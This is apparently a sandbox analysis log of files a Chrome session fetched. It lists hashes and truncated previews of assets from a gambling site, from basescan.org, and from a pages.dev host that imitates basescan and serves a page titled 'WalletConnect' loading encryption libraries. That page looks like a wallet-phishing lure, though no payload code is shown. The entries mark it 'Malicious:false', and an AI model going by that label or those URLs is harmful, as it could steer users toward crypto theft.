                                                                                                                                                                                                                                              SHA1:9C44DE4117C62B2C491C371B11083122AD5D82D6
                                                                                                                                                                                                                                              SHA-256:B6ECC59192493C170E1BF0C577FCF111596DE7BE651F7FA1C636ADD71C11B1DE
                                                                                                                                                                                                                                              SHA-512:C19BA3C9E20ED7770414E6288C57D4C8B120310EC17A30557329EF0AFD7EF9CAF5BA9AFA900818D7DA15703D2C76BB40E36CE0C920B1C3F16EBAC3A34BE5F4D6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-28125cc0.js
                                                                                                                                                                                                                                              Preview:import{d as M,c as l,u,k as w,e as B,s as g,t as k,r as T}from"./web-13cf6287.js";import{k as z,v as J,c as Q,h as D,M as A,o as y,a as G,u as N,w as W,d as K,x as L}from"./solid-js-38561dfe.js";import{a8 as R,e as b,u as Y,h as q,t as I}from"./manifest-51a3674f.js";import{g as F}from"./index-3fd48be3.js";import{h as $}from"./http-f4555b94.js";import{t as j}from"./toast-unhandle-error-992739c6.js";const C=z(()=>{const o=R("/game-support").connect();return J(t=>{const e=R();return o.on("bonus-crocodile",e.decodeBind(n=>{t(n)},"json")),()=>{o.off("bonus-crocodile"),o.disconnect()}})}),V="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACQAAAAkCAMAAADW3miqAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAACoUExURUdwTPW0CPm9B/a2B//MBv7JBvm9CfOyBvvEDP/MBv/NB/CpBvCoB/CpBv/LBv/NBv/FT/CoB/i8Bu+oBvCsB++oB//OB//OB//NB/+9C//MM++oBv+qK/+zBv/MBv/////LBu+oBv7GBv+2B//ABv+5Bv/KBve7BvrCBv++K//kpv/Vdf/qu//otf+9Bv/FQP/13v/ah/+4F//flP/x0v/KU//DO//564N2FJwAAAAddFJOUwA7Ikbd7zP+FPeU6JWjwqUDYeb32L5sUIL4BXQGxzxp6QAAAcJJR
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (679)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                                              Entropy (8bit):4.969608273824473
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:9EAXsCEPGxSfLZudG+MtI+pwm+Rbet2AZ3gt/JQ/Z/FYoLUQD9M/1/Dn:9TsC4vZuOK+pwdRK8MgRJQdFYBQu/1/D
                                                                                                                                                                                                                                              MD5:D00FDBE0A6C7E81D73ADB155CB05FFAE
                                                                                                                                                                                                                                              SHA1:443C65F821F6CD6ABAFE72BCBBC3BBA70333B98A
                                                                                                                                                                                                                                              SHA-256:0369FE7001FC110E894904BA8050B4168BC8EB3F284FA090268780B10194B9F4
                                                                                                                                                                                                                                              SHA-512:5CD0BE7C6F0232DD375D929886F379A6A935C89D1EFE0F68A12E09FB43E32895F64017CC3DAE68C14A9D6C9039A774A732936555EDC046A5BDA885A58DABF32B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/components/hs.malihu-scrollbar.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSMalihuScrollBar={_baseConfig:{scrollInertia:150,theme:'minimal-dark'},_pageCollection:$(),init:function(collection,config){if(!collection||!collection.length)return;var self=this;config=config&&$.isPlainObject(config)?$.extend(true,{},config,this._baseConfig):this._baseConfig;return collection.each(function(i,el){var $this=$(el),scrollBar,scrollBarThumb,itemConfig=$.extend(true,{},config,$this.data());$this.mCustomScrollbar(itemConfig);scrollBar=$this.find('.mCSB_scrollTools');scrollBarThumb=$this.find('.mCSB_dragger_bar');if(scrollBar.length&&$this.data('scroll-classes')){scrollBar.addClass($this.data('scroll-classes'));}.if(scrollBarThumb.length&&$this.data('scroll-thumb-classes')){scrollBarThumb.addClass($this.data('scroll-thumb-classes'));}.self._pageCollection=self._pageCollection.add($this);});},destroy:function(collection){if(!collection&&!collection.length)return $();var _self=this;return collection.each(function(i,el){var $this=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):26248
                                                                                                                                                                                                                                              Entropy (8bit):7.987741565898816
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:Zkaoe2zMiFR+4R5FMUFF2h4vsrNWeGWL9y:qaoef6AMxFFaXc
                                                                                                                                                                                                                                              MD5:D99E2A573EF854BBC361176C515EBA1A
                                                                                                                                                                                                                                              SHA1:4792EC54B1197F1A6332AFF44849C9C0568B3C39
                                                                                                                                                                                                                                              SHA-256:17719DB4DFF479A9263AC261683B473F99CE678E21792309E158B56F22527EA8
                                                                                                                                                                                                                                              SHA-512:E566F46B5DD64F893721BAD6F57F228CA16F4AB8EB2516DB7E9CB149ED0DC1865009870062C4BA1D3388996205DC8B8C0D873F0C0E6FD17028FC372F6667AA78
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/casino-aibc-europe-2022-DqIMtApB.png
                                                                                                                                                                                                                                              Preview:RIFF.f..WEBPVP8Lsf../..=...).$G.g....;$.=..fE..G.$9RV..cp.....9.. D....G..........@..@m..-.....@.,.4...l...%.v...........$.Q...H..............@L....@@.... .........@B..../.b.I..M@@..R)C$X.#I...~...@h# .B@/.$d!"t......b..Y....~/u.n:...>ud...-......oU.E..:/.....SU.....gs....m,..l.{.vs.?SVa-..._...5(3b...S.ql....Z..q..O5-.&...>=.m.."#~D......U..B.c..d.Ak[...eM.......!..s.'..{.=.=.L...7#..s....~{q...._$,L.NO .4..zV....{.k.s.P.v>.6.>...z.k............z..._..........d3..,.W......(.."}Q5...@."E4L4.......j.F..U...m...9.CDL.@R".....(...NN+...[..%......=.e.vm...9. 0...9^...3........s..o3D...d.uk.EQ6...}...P..i..m.mI..$.."!. .3K"4/..t..{..d..1".O....d9o..d.Kp/....m[....If..S......$(s......1.jtL..C.{....OZ......Ir.6...8.........%..4...5..i.. ......B...B.*"@..\..u!...W.-.....D..i..._j....DIV.V"R.....Z....`rl.#I.a.NO..........t...@.^M .R.vM...>.s../.v..m..o..x.)TTP.g.%....E.R...b$...H. |../...2.U....*...*g.....^.4...};.o.c.#.....*..hxcQ!.l..A.&En..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2897)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2898
                                                                                                                                                                                                                                              Entropy (8bit):5.130909834587299
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:LXi5WbIo9WFolWioJWCogWnonWPo+EWveopfWtomWYoLWQ3oJW4XolWTolWy3oxF:Lclyy+hZeI0F638XLa32T1W1+1yVjNBi
                                                                                                                                                                                                                                              MD5:EB80D4DC4E917572ED47BFCCBBC709F8
                                                                                                                                                                                                                                              SHA1:48ACDBCB106D4673FC5A4248E00EF58078AB9DB5
                                                                                                                                                                                                                                              SHA-256:B76B6B48845B550FFF9B0AF274CBEDEC20F128DEDE94FD05D0D3FF0281785310
                                                                                                                                                                                                                                              SHA-512:A864300ED40638647B423322BE04BF5D46E813283D300FADB319BB31CEA03F6EAA5072D0283360F1F92878EDF9ECC30E35CBA8BA7819B9C2F25DB9F0E3A13176
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{V as t,_}from"./manifest-e71017e8.js";const{t:i,Trans:n}=t(Object.assign({"../locales/ar-SA/index.json":()=>_(()=>import("./index-df8a1f18.js"),[]).then(e=>e.default),"../locales/bn-BD/index.json":()=>_(()=>import("./index-2b6adc51.js"),[]).then(e=>e.default),"../locales/de-DE/index.json":()=>_(()=>import("./index-39de8abe.js"),[]).then(e=>e.default),"../locales/en-IN/index.json":()=>_(()=>import("./index-001f2211.js"),[]).then(e=>e.default),"../locales/en-US/index.json":()=>_(()=>import("./index-b0d72fd9.js"),[]).then(e=>e.default),"../locales/es-ES/index.json":()=>_(()=>import("./index-e746d3c0.js"),[]).then(e=>e.default),"../locales/fa-IR/index.json":()=>_(()=>import("./index-5cb34648.js"),[]).then(e=>e.default),"../locales/fi-FI/index.json":()=>_(()=>import("./index-fbccaf4a.js"),[]).then(e=>e.default),"../locales/fil-PH/index.json":()=>_(()=>import("./index-a9126949.js"),[]).then(e=>e.default),"../locales/fr-FR/index.json":()=>_(()=>import("./index-4ae3f7de.js"),[]).then(e=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1064
                                                                                                                                                                                                                                              Entropy (8bit):7.690082834401541
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:GzHd7HeseXwQCdqqfSW8Tn0Yml4gKci+LgTVPvI990Jzwmj5Qs2:Gzd+9wQFqfMTHG38TVvI9yzwmm1
                                                                                                                                                                                                                                              MD5:875E176D4C27691286328A6FC9F02682
                                                                                                                                                                                                                                              SHA1:F63AEA01CF864994ACBD525C46AEA7D8F081BC44
                                                                                                                                                                                                                                              SHA-256:C9CD25795124D8B3AD6EB400CD849AA02B4EB25C56A53E602E0F4384A2BDF73D
                                                                                                                                                                                                                                              SHA-512:9E7F9C1810189DE9B9D4D0EF814507A45DF7C10F60A80D488EE1C043BFB3C74B9A6DCDA46934673CF967AEB707D65795470F972C3338A41B408882ED62334183
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....IDATx..[O.Q........-BUZ..)%(`...D.QA..p.-!T....A.$.G!.l.......E..0.3.v....n2.g......1e:..+*a.U,I.K$...............?.p....H.,.....8.:...".l.}x.....;`.}J.......A...M.......8W@...`.".I.t..'N0.s.". .{..q#.NO........h...hD>..K..U.-.9[...Q....A0.h.e....Rk a..\.v7............._A.Q..~.D.f. .x.g.D.@t.Z.~.~...:.......m.....Y1..$.6........u......%(o...A..R@...w......*.^@..|2........1.Y..B[....@......6...f.Uh.#@..0.r.."a8..(.Wyg....'.0.YC......... .P.).....3.I.O.0.0...a....\./.N....zeU.|...)..S.J....p.=`...M.S..../-/.8...T.-.t..E.G..E}...B.pq..Q....DY........9l`.|....D.`......&..jZpV...C......`.j..........V..5"....E...h.../...7J.P.#....T..K)CC...C.].)..*p.S.lo..jt.h.(sXE.H..40.k.x.(.oQ?=.... ,............e.....L....#..y0.j.+....i I...F..RR.....y.2.g..c.n?.{`.:#..&^F.\.m[=9.......!.M..UE.@...z.@..w..k".51.t6"8...^5H.@.....G.'...4..=.]..@.$O.H.2.a...."....{.v.{ivI..]........fB.P.'..jVz..M.....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3072
                                                                                                                                                                                                                                              Entropy (8bit):7.9058988937688035
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:AyEOh4gL4oEIpwWGTuQynmh262CB0qXidfU4WiW4W+o3GaPOz3cJenJ6m3Ill2/H:AeLFEyJKPhbShXXW4fBaPCJ6mYllkt
                                                                                                                                                                                                                                              MD5:0170726772845C69BD998DD484E5ACF8
                                                                                                                                                                                                                                              SHA1:E3D7D8EA24FD5B829BF0B71E22F245EFA3572628
                                                                                                                                                                                                                                              SHA-256:301708396EAF54928F8D4CAE067C640CCB57FECF3056DB9F3A410EB5CFB674D0
                                                                                                                                                                                                                                              SHA-512:10A858E9C83F162063AC0727FCE40EDE9845028C2F09171A7F77DA338266899C5E42C540BABDD02320F6A2A768658867A6AEA6EDA2F7C57D3DD4BBC4E994DFAD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/responsible-gambling--34MNE2A.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../6A...`.m......8.......{...m..7ua...$..._g.....}..<.@.WI.&@.8...[.Y....|.[.m[Y..bC....?.H.)..Z.....O......^"..KDD?.....C..DD..y...~_.....B...d....d.Q...BD..........x.L.G ......'......x..93s....R..*..%..... |x..=.....z..$g.S..4.UG6g.i....6K..0.V......_...s../.A..0.o..[Y......t.>..ea....{ID...5g.H.(...f..z;./.-.\n3$'..Whgf&.....H.p..+..-}D2..n.5Q4.../.e.y%.M.Y.;..h..U....f..3....:..{,-.g.'L._.....4..*.d5.J4.W.%.O...3...S..i..Ub.|..i".-.Y..4.F..MWhb.H....L.2..D.Si*..J.n.......H..Z.!.^..r..U.O.)@.A.}.P4.h...S.........d.q..,N....)."..U.!.....8+nJK^..5..W..U...-$Ln..S:.j...w...*.q5.R...K....Ce,...{l.G.*.m..[..59$c.l.`_.".pk"...]..j.d..n.u...#X..b$...P5.........^.2.kE.JD..,.....u.X..&W.l.Fz..!3....~u.Q....8.@..9Fv.@......d..9.4....J...S...oV.`.D..h.H..f.@..C...K...h..E..l1.bQ.....+.......AC....).g.$$...o.!..?..z....K.r..,pW.8......._...d......E....[..u.~_F|...........mF..).:T....X..vg..i=.L......J./on..#|O5.....j1.l-#`k..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1413
                                                                                                                                                                                                                                              Entropy (8bit):6.139106289683391
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6L+kzum8COZNDsLlpGPUc6QlpfjVAVO/8b58MopUXN4v4q/vJJ:+ZYjw+klfll0xlp7VsO0bxU4qj
                                                                                                                                                                                                                                              MD5:831442B012A8A22FE9C7F4ADD129B6C1
                                                                                                                                                                                                                                              SHA1:1B81F9F07DF4ABE1452025E45AFE78336663A32E
                                                                                                                                                                                                                                              SHA-256:2E7CE2FE3084ED1FE53358CBCAC89C76751C3F496C01F7F5F8D08719BB00F908
                                                                                                                                                                                                                                              SHA-512:ADF82F0B44A6651FF91EA7C1E62DEF22865BDC1BBF448AECB82EA28A74B173EDAB3B6885B9002BDB17BBAA3DED370B8E79989CF873D405FA433FEE91AA02C630
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/93329c6f8b.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...R...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................Zmdat........0@CA.2.......1..+V..%.m!.xu."H...`X.!K...T6,7%.$.qC[..&._p.}.....[..l.....9K..mf.}..>(.S.D.'."...G,"'....lPG|..F.v.y.d>..5.D...e.`.3n...O....4.8.....A...W\...l.BL..k
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1087
                                                                                                                                                                                                                                              Entropy (8bit):7.591217377725829
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:L72SrxxEpzT84UW6SYDdT4kxLoAFBJBLlgV:2qCtXURfDdT3xLoAbJJlO
                                                                                                                                                                                                                                              MD5:E5C2289F6CFD9466789091F400BE9E73
                                                                                                                                                                                                                                              SHA1:DDDB20BEB38FE15E3A7905D09C425950B0421635
                                                                                                                                                                                                                                              SHA-256:CCC94F6BF87D2E5D48773F33A8B54308E908CBC41D5B8FF6DAA8B46BE02D0B4C
                                                                                                                                                                                                                                              SHA-512:5C601C3E19F60D2B4CA78905E6725B07C7530D866486B6F564C876EE0C0C9D535BEB88A5AE0328F85C5D5012133247760D9D37F9A69CBBB94E46D41D9B9C9FD3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE....#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#....1.?.........I.&.....l...9............r.O..........~..`.Y.-..........e.............tRNS.....w2 .N......~rjB=6.*...Mz.TF....IDATx....n.0..`g'a_ZJ..1...C)]....5B.L:c...c.....(r|c....W..u.w.......3..Q.A....3.......Q.A..M.......S#.......()LXI=...=V.e.'i^......9c.\.@.b..u..c.u..`.....s...........pr...!.r\b..x.b~.aP]>_Z0.%.%0.LR.....[-.0.....K..o.%4z...H.7#.q...B...{G..eT..Q.?C........*A.AH!|.-.(!1........SeJ.......r...!D..!U....h.t(L..k...r}v.).2B.l...!.a.~..................Q.;.....~T.CI!.....^YZ<Z.~..d<.b.B...H.J...._!u."j.&.A.)F.M.....2mvM..r..2.X..2;N.;.4.O...%.U...J...$.U..0.C.5!.1!c.....2.]......+.^...G+.<q.....[...&..C.4.e%[.WP....*..T.^.gk.G+..........~'\XB*&/$.\.C./.>...T@^.=r..&..S.R.|@n@[p..R.'m.0.......SBf..$.Y[...n.. W3.1..A.kn...A!1vX..B!4w..@....n....QT..A.b.P-}XB-$.....R.<x.+...|.N..W..v(..^...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/style.css
